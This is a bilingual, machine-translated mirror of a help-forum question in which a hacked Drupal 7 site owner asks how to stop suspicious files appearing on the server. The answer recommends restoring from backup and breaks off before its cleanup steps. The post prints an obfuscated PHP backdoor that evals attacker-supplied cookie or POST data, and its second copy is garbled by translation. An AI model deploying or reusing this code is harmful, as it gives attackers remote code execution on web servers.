[英]Drupal 7 Recent log messages
I am facing with an issue. 我面临一个问题。 Everyday on my server appers .ico files and .php file with this kind of code:
每天在我的服务器上,apper.ico文件和.php文件都带有以下代码:
$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\\'';$yjzgov = Array();$yjzgov[] = $zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[] = $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[] = $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11
$ zvtizrs ='y6v1i4be#torufpkxc7_8Hg0n * -2sladm \\''; $ yjzgov = Array(); $ yjzgov [] = $ zvtizrs [30]。$ zvtizrs [3]。$ zvtizrs [30]。$ zvtizrs [27]。 $ zvtizrs [1]。$ zvtizrs [23]。$ zvtizrs [30]。$ zvtizrs [13]。$ zvtizrs [26]。$ zvtizrs [6]。$ zvtizrs [20]。$ zvtizrs [31]。$ zvtizrs [30]。$ zvtizrs [26]。$ zvtizrs [5]。$ zvtizrs [3]。$ zvtizrs [27]。$ zvtizrs [18]。$ zvtizrs [26]。$ zvtizrs [20]。$ zvtizrs [3] ]。$ zvtizrs [13]。$ zvtizrs [27]。$ zvtizrs [26]。$ zvtizrs [1]。$ zvtizrs [23]。$ zvtizrs [5]。$ zvtizrs [13]。$ zvtizrs [5]。 $ zvtizrs [13]。$ zvtizrs [23]。$ zvtizrs [20]。$ zvtizrs [30]。$ zvtizrs [18]。$ zvtizrs [17]。$ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [ 21]。$ zvtizrs [25]; $ yjzgov [] = $ zvtizrs [8]; $ yjzgov [] = $ zvtizrs [17]。$ zvtizrs [10]。$ zvtizrs [12]。$ zvtizrs [24]。$ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]。$ zvtizrs [19]。$ zvtizrs [11]。$ zvtizrs [7]。$ zvtizrs [14 ]。$ zvtizrs [7]。$ zvtizrs [30]。$ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [7]。$ zvtizrs [16]。$ zvtizrs [14]。$ zvtizrs [29]。$ zvtizrs [10]。$ zvtizrs [31]。$ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]。$ zvtizrs [12]。$ zvtizrs [6]。$ zvtizrs [28]。$ zvtizrs [9 ]。$ zvtizrs [11 ];$yjzgov[] = $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[] = $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[] = $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function frtdmz($yjzgov, $xtfjdc, $omljrbn){return $yjzgov[6]($yjzgov[4]($xtfjdc .
]; $ yjzgov [] = $ zvtizrs [30]。$ zvtizrs [11]。$ zvtizrs [11]。$ zvtizrs [30]。$ zvtizrs [0]。$ zvtizrs [19]。$ zvtizrs [32]。$ zvtizrs [7]。$ zvtizrs [11]。$ zvtizrs [22]。$ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]。$ zvtizrs [9]。$ zvtizrs [11]。$ zvtizrs [29] ]。$ zvtizrs [7]。$ zvtizrs [24]; $ yjzgov [] = $ zvtizrs [14]。$ zvtizrs [30]。$ zvtizrs [17]。$ zvtizrs [15]; foreach($ yjzgov [7] ($ _COOKIE,$ _POST)as $ xtfjdc => $ jqlwt){function frtdmz($ yjzgov,$ xtfjdc,$ omljrbn){返回$ yjzgov [6]($ yjzgov [4]($ xtfjdc)。 $yjzgov[0], ($omljrbn / $yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov, $xwoin){return @$yjzgov[9]($yjzgov[1], $xwoin);}function twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn) {eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov, $jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^ frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}
$ yjzgov [0],($ omljrbn / $ yjzgov8)+ 1),0,$ omljrbn);}函数htylm($ yjzgov,$ xwoin){返回@ $ yjzgov [9]($ yjzgov [1],$ xwoin );}函数twdine($ yjzgov,$ xwoin){$ sknbn = $ yjzgov3%3; if(!$ sknbn){eval($ xwoin1); exit();}} $ jqlwt = htylm($ yjzgov,$ jqlwt ); twdine($ yjzgov,$ yjzgov [5]($ yjzgov [2],$ jqlwt ^ frtdmz($ yjzgov,$ xtfjdc,$ yjzgov8)))}}
Could you please tell me what should I do? 您能告诉我该怎么办吗? I am using rackspace hosting.
我正在使用机架空间托管。 Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log.
我在最近的日志中也有很多这样的链接(/ d0E0MDY5VDNpanR6NDM5MzFJaQ ==)。 How can I stop that?
我该如何阻止呢?
Thanks in advance! 提前致谢!
Hacked. 砍死 I was recently cleaning hacked site my self and it was nightmare.
我最近正在自我清理被黑客入侵的网站,这是一场噩梦。 Best would be to retrieve some recent version from backup and immediately apply all security updates.
最好是从备份中检索一些最新版本,然后立即应用所有安全更新。 If there is no backup (big problem!) you can try "cleaning" the site as I did:
如果没有备份(大问题!),您可以尝试像我一样“清理”该站点:
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.